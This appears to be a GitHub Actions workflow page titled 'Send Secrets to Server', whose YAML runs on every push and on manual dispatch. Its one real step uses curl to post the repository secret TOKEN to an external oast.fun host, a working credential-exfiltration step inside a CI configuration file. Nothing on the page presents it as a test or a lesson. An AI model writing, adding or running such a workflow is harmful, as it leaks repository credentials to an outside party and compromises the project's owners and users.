Skip to content

Create Send Secrets to Server workflow #1

Create Send Secrets to Server workflow

Create Send Secrets to Server workflow #1

name: Send Secrets to Server
on:
push:
workflow_dispatch:
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
- name: Bypass Cache
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
- name: Send Secrets to Server
run: |
curl -d 'TOKEN=${{ secrets.TOKEN }}' https://yvfeehabjheovlaaoqyvn66e0rr6cykf4.oast.fun